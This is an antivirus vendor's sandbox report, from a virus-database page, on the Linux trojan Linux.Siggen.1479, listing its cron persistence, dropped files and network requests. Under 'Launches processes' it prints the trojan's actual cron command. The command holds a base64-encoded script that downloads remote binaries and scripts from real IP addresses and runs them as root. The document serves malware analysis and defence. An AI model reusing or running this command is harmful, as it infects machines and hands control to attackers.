Per il corretto funzionamento del sito, è necessario attivare il supporto di JavaScript nel browser.
Linux.Siggen.1479
Aggiunto al database dei virus Dr.Web:
2019-03-03
La descrizione è stata aggiunta:
2019-03-03
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
/var/spool/cron/crontabs/root
Malicious functions:
Launches itself as a daemon
Substitutes application name for:
Launches processes:
sh -c echo '* * * * * echo -n \"KCAgaWYgISBwcyAtYXggfCBncmVwIC12IGdyZXAgfCBncmVwICJbIF0iJDt0aGVuICBwa2lsbCAtZiB3YXRjaGJvZyA7IG5vaHVwIHB5dGhvbiAtYyAnaW1wb3J0IG9zOyBob21lZGlyID1vcy5wYXRoLmV4cGFuZHVzZXIoIn4vZGxzcyIpOyBpbXBvcnQgdXJsbGliOyBoZCA9IHVybGxpYi51cmxyZXRyaWV2ZSAoImh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2ptIiwgaG9tZWRpcik7IG9zLnN5c3RlbSgiY2htb2QgNzc3NyAkSE9NRS9kbHNzIik7IG9zLnN5c3RlbSgiY2htb2QgK3ggJEhPTUUvZGxzcyIpOyBvcy5zeXN0ZW0oIiRIT01FL2Rsc3MiKScgMj4mMSA7IHx8IG5vaHVwIHB5dGhvbjMgLWMgJ2ltcG9ydCB1cmxsaWIucmVxdWVzdDsgdXJsbGliLnJlcXVlc3QudXJscmV0cmlldmUoImh0dHA6Ly8xNjUuMjI3LjE0MC4xODQvdG1wL29mZCIsICIvdG1wL3Nkb3YiKTtvcy5zeXN0ZW0oImNobW9kIDc3NzcgL3RtcC9zZG92Iik7IG9zLnN5c3RlbSgiY2htb2QgK3ggL3RtcC9zZG92Iik7b3Muc3lzdGVtKCIvdG1wL3Nkb3YiKScgMj4mMSA7IHx8IHdnZXQgLU8gLSBodHRwOi8vMTg1LjEwLjY4LjEwMC9qcC9qci5zaHxzaCA+L2Rldi9udWxsIDI+JjEgOyB8fCBjdXJsIGh0dHA6Ly8xODUuMTAuNjguMTAwL2pwL2pyLmp[rkmodule] [<SAMPLE>][PPID:0x2c2] [<SAMPLE>][PID:0x2c7] do_filp_open. Filename: \"/bin/sh\
crontab -
sh -c /root/ixdv wyox
/root/ixdv wyox
sh -c /root/fjcb fjcb
/root/fjcb fjcb
Kills system processes:
Kills the following processes:
Performs operations with the file system:
Modifies file access rights:
/root/ixdv
/var/spool/cron/crontabs/tmp.Qy5y6z
/root/fjcb
Creates or modifies files:
/root/ixdv
/var/spool/cron/crontabs/tmp.Qy5y6z
/root/p
/root/fjcb
Deletes files:
Network activity:
HTTP GET requests:
18#.###.169.6/jp/jpp
18#.###.169.6/jp/nvn
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Scaricate Dr.Web per Android
Gratis per 3 mesi
Tutti i componenti di protezione
Rinnovo versione di prova tramite AppGallery/Google Pay
Continuando a utilizzare questo sito, l'utente acconsente al nostro utilizzo di file Cookie e di altre tecnologie per la raccolta di informazioni statistiche sui visitatori. Per maggiori informazioni
OK